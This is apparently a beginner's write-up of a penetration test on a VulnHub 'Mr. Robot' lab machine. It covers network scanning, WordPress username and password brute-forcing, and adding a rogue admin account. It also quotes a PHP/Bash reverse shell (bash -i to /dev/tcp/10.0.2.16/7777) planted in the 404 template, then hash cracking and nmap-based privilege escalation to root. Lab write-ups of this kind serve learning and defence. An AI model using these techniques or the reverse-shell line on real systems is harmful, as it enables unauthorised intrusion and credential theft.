A Penetration Test on a Web Server

Disclaimer: Educational Content

I've decided to write my first article describing step by step the penetration test performed on a virtual machine. I want to explain, even to those who are not very familiar, trying to be as simple as possible all the procedures.

This is just one of the many exercises I'm carrying out in preparation for the certifications.

The virtual box was downloaded from https://www.vulnhub.com/ and has an EASY difficulty level. It has 3 keys to find to demonstrate that you have managed to compromise the machine. Although it is a vulnerable box based on a popular TV show, very often these types of virtual machines designed to be hacked rely on real-world scenarios.

Now let's start with finding the IP of the machine to start our attack.

We know that the host we need to attack is on the subnet 10.0.2.0/24.

The notation "10.0.2.0/24" means that we are talking about a specific part of a host network. To understand how many hosts can be connected to this part of the network, we need to look at the last digit.

The "/24" tells us how many IP addresses can be assigned to computers within this part of the network. In this case, means that the first three numbers of "10.0.2" are fixed and the last numbers can vary from 0 to 255. This gives us a total of 256 possible IP addresses.

So, how do we find our target?

Nmap is a tool used to explore and scan computer networks. It can help discover which devices are connected to a network and what services they are running. It's like mapping out the network to understand what's there and how it's organized.

Let's start searching all the IP addresses active by sending a ping signal with Nmap to the network 10.0.2.0/24.

We've identified 5 active hosts.

Now we can perform more detailed scans for each of the previous IP addresses to understand what type of device is connected to the network, it's a PC, a web server, or something else?

Let's analyze 10.0.2.5

Scanning 10.0.2.5 with Nmap provides detailed information about the services and open ports on the target host. It indicates that port 80 is open for HTTP and port 443 is open for HTTPS. It also provides information about the target computer's operating system and other relevant details, such as the MAC address of the device.

Port 80 being open for the HTTP protocol (Hypertext Transfer Protocol), is the protocol used to transfer information on the web. It's the language that web browsers and web servers use to communicate with each other.

Let's try to connect to the website https://10.0.2.5 to see what we can find.

We are facing a web server for managing a website.

While we manually explore the site, we can use another very useful tool to explore the server and search for initial vulnerabilities.

Dirb is a tool used to perform scanning attacks and directory search on a web server.

It works by examining a series of possible paths and directories. These paths can include standard directories such as /admin, /backup, /login, and many others. Dirb scans the web server to verify which of these paths actually exist and are accessible, analyzing the web server's responses to determine whether the directory is accessible or not. If it receives a positive response (e.g., a status code 200), it means the directory is accessible and may contain sensitive information.

This tool can search for files with known names indicating a vulnerability, such as "config.php" or "robots.txt".

One of the most interesting directories to check is that of the file "/robots.txt" and "/wp-login":

The "/wp-login" directory shows us a potential access point.

We are facing a website built with Wordpress, and this is the login screen. If we try to login with the credentials:

user: admin and password: admin

We receive the error message "invalid username." It's always worth trying default login credentials; often they are not disabled.

However, we can still extract useful information from the error message: we can assume that by entering a valid username, the error message would be different. But how can we find a valid username?

Let's continue with our enumeration of directories; we might find more...

The robots.txt file is a tool used by website owners to control how search engines index their website, influencing the visibility and presentation of the site in search results.

This directory shows us two more paths to check that we weren't able to find with the Dirb scan or our manual exploration of the site.

By visiting https://10.0.2.5/key-1-of-3.txt, we will find our first key.

While visiting https://10.0.2.5/fsocity.dic, we will download a dictionary file containing many words.

By counting the words inside the file, we discover that there are more than 800,000, and some of them might be duplicates. Let's sort the file.

By doing this, we eliminate all duplicates and end up with a file called uniq_fsocity.dic containing 11451 unique words.

Within this file, there might be valid usernames and passwords to access the Wordpress dashboard. We could try a brute force attack.

Now, let's introduce a very useful tool for preparing this type of attack:

Burp Suite is a tool primarily used for web application testing and web application security. One of its most commonly used features is analyzing HTTP requests and website responses.

You can analyze the HTTP requests sent from the browser to the web server. This includes information such as the requested URL, request parameters, cookies, HTTP headers, and more. You can also manipulate and modify these requests to test the server's behavior in different situations.

In our specific case, we need to analyze the request sent when trying to log in.

We can also analyze the HTTP responses sent from the web server to your browser. This includes information such as the HTTP status code, response content, HTTP headers, and more. You can also examine the content of the received web page to identify potential vulnerabilities or security issues.

If we send our request with the credentials user admin and password admin, we receive the same response as before with the error message "Invalid username."

We need to find a different one…

We can proceed directly with Burp Suite for trying a brute force attack, but since the free version is slower compared to other tools, we will use FFUF instead.

As a starting point, we will use the uniq_fsocity.dic file to find a valid username. We have more than 11.000 words, it might works…

Using the browser request saved in the "burp_request.txt" file obtained through Burp Suite and applying a filter to the responses from incorrect usernames, we were able to try all 11454 words in the file in less than 2 minutes and discover that the username "elliot" is a valid one.

We can repeat the previous process to try to discover the password.

We have discovered and obtained valid credentials that grant us access to the Wordpress dashboard.

User: elliot Password: ER28-0652

Here are the annotations so far:

1. We were able to find the default Wordpress login screen. It might be advisable to modify it to make it less identifiable.
2. We found an unencrypted file containing login credentials available for download.
3. The login page is vulnerable to a brute force attack: we were never blocked even with a rate of 90 requests per second.
4. Wordpress version 4.3.33 is installed, while the latest version is 6.4.3: updates are crucial to fix many vulnerabilities.

Once inside the dashboard, we need to explore to understand the privileges we have gained.

Checking the User section, we discover that the user "elliot" is an administrator, and the only other user present has lower privileges. From here, we can try to add another user for two reasons:

1. To see if we can do it and expose another vulnerability.
2. To ensure ourselves a second and more secure access point in case the user "elliot" changes the password if they have detected our access.

We can add a new user with administrator privileges, and we can even use very weak passwords.

We have successfully added a new user and have managed to log in with the new credentials.

At this point, we need to find a way to connect directly to the web server without going through the browser so that we can fully compromise the host. We haven't yet been able to find important files.

Upon reviewing the scan performed by Nmap, we notice that there is an SSH (Secure Shell) port, which is a secure way to connect and communicate with another computer over a network, but this port is closed.

Since we are unable to directly connect through our attacking machine, we can make the server we are attacking connect to us using a reverse shell.

Normally, when a computer connects to another to gain remote access, a direct connection is established from the attacking computer to the target computer. However, in a reverse shell, the connection is "reversed": the target computer connects to the attacking computer.

Requesting a direct connection from an attacking machine might be blocked by the firewall that controls incoming transmissions, a reverse connection might not be blocked.

To create this connection, we can inject a piece of malicious code into a web page using the privileges of the new user we created earlier.

From the Wordpress editor on the 404 page, which appears when we try to visit a non-existent directory, we can input a simple PHP code to create our connection.

The code works as follows:

1. The exec() function in PHP is used to execute commands on the server. In this case, the executed command is "/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.16/7777 0>&1".
2. This Bash command makes use of /dev/tcp/10.0.2.16/7777, which is a reverse shell. This means it attempts to establish a connection to our IP address 10.0.2.16 on port 7777.

Once this code is inserted and the 404 page is triggered from the browser, the server will attempt to connect to the attacking machine.

We have successfully established a remote and direct connection to the server. Now, we need to repeat the procedures to explore where we are and what privileges we have.

We don't have permissions to read the file "key-2-of-3.txt" located in the "robot" user's folder, but we can read the second file.

The one we found could be the hash of the password for the user "robot," and indeed, it is identified as an MD5 algorithm hash.

We can try to decrypt the hash, again using the uniq_fsocity.txt file as a dictionary. We've already found a valid password thanks to it, it might work again.

Thanks to Hashcat, a password cracking tool used to recover or "crack" passwords using brute-force techniques, we have discovered the password for the user "robot."

Before logging in with the new credentials, let's see what else we can do: can we transfer malicious files?

Through wget and a simple HTTP server, which are tools used in managing and interacting with web servers, we can transfer our file from our attacking machine.

• wget is a command-line utility that allows you to download files from a web server using HTTP, HTTPS, and FTP protocols: you simply provide the URL of the file you want to download as an argument.
• For example, wget <https://www.example.com/file.txt> will download the file file.txt from the web server at the address https://www.example.com..

From the computer I'm attacking from, let's start a local web server with the file we want to transfer.

From the web server I'm controlling, I'll fetch the linpeas.sh file, which is a bash script that will help us identify and enumarete other vulnerabilities when executed.

We are able to execute the script, which visually helps us enumerate all possible ways to elevate our privileges and enumerate all vulnerabilities on the server. The file assists us in identifying and highlighting them with different colors.

This type of exploration can also be done manually, but using scripts like these helps to be more precise and efficient.

Let's note another vulnerability:

1. We were able to transfer a malicious file and execute it even with low privileges.

Now, let's log in as the user "robot" user and see what privileges it has.

We'll open a terminal using a simple Python code to log in:

The command python -c 'import pty; pty.spawn("/bin/sh")' is an example of obtaining an interactive shell on a Unix-like system.

Here's what this command does:

1. python: starts the Python interpreter.
2. c: this option indicates that the code to be executed follows immediately.
3. 'import pty': this Python code imports the module that we need, which allows controlling pseudo-terminals in Unix-like systems.
4. pty.spawn("/bin/sh"): this code uses the spawn function of the imported module to start an interactive shell /bin/sh. This command starts a new interactive shell in the current terminal.

This type of command is often used in hacking or penetration testing contexts, where one wants to gain access to an interactive shell on a remote system after exploiting a vulnerability.

Once logged in as the "robot" user, we gained access to the file that we couldn't read before. We found the second key, but we still don't have root user absolute privileges.

Unfortunately, we weren't able to find hashes or passwords saved in plaintext to log in as root.

Thanks to the program previously executed to find a way to elevate our privileges, we notice that the nmap function present on the server could be useful in our case.

The website https://gtfobins.github.io/ is a valuable resource for security researchers and cybersecurity professionals. It helps identify commands and techniques that can be used for privilege escalation in Unix-like environments when having access to a user with limited privileges or in restricted environments.

Exploring the section related to nmap, we find that if specific commands are executed from an interactive shell, we can elevate our privileges.

1. We have a shell
2. and we have access to nmap

And if we execute the commands from point b), we are able to obtain root privileges.

Now that we are logged in as root, we have absolute access to the server. As a proof, we can access the root user's folder and find our last key.

Furthermore, we have access to other highly sensitive files such as /etc/passwd, which contains basic information about users, and /etc/shadow, where encrypted passwords of users are stored to ensure greater security.

At this point, we have obtained the privileges necessary to fully compromise the server, and all that remains is to use all the evidence and notes from the penetration test to prepare a report to be delivered to the potential client. In the report, we will present the evidence and provide recommendations on how to address the vulnerabilities.

p.s.

The content was provided in this article is intended for educational purposes only. While every effort has been made to ensure the accuracy and completeness of the information presented, the author makes no representations or warranties regarding its reliability or applicability to any particular situation.

Readers are advised to independently verify the accuracy and relevance of the information provided. The views and opinions expressed in this article are those of the author alone and do not necessarily reflect the views of any organization, employer, or entity with which the author may be affiliated.